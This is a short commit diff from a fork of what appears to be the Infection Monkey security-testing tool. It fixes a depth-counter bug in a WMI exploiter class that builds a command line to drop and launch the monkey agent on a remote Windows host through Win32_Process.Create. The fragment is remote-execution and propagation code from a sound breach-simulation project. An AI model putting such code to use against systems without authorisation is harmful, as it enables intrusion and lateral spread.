forked from p34709852/monkey
Agent: fix a bug in WMI exploiter related to depth
This commit is contained in:
parent
4ce731c769
commit
16535e06c7
|
@ -95,13 +95,13 @@ class WmiExploiter(HostExploiter):
|
|||
"dropper_path": remote_full_path
|
||||
} + build_monkey_commandline(
|
||||
self.host,
|
||||
self.current_depth,
|
||||
self.current_depth-1,
|
||||
self.options["dropper_target_path_win_64"],
|
||||
)
|
||||
else:
|
||||
cmdline = MONKEY_CMDLINE_WINDOWS % {
|
||||
"monkey_path": remote_full_path
|
||||
} + build_monkey_commandline(self.host, self.current_depth)
|
||||
} + build_monkey_commandline(self.host, self.current_depth-1)
|
||||
|
||||
# execute the remote monkey
|
||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
|
||||
|
|
Loading…
Reference in New Issue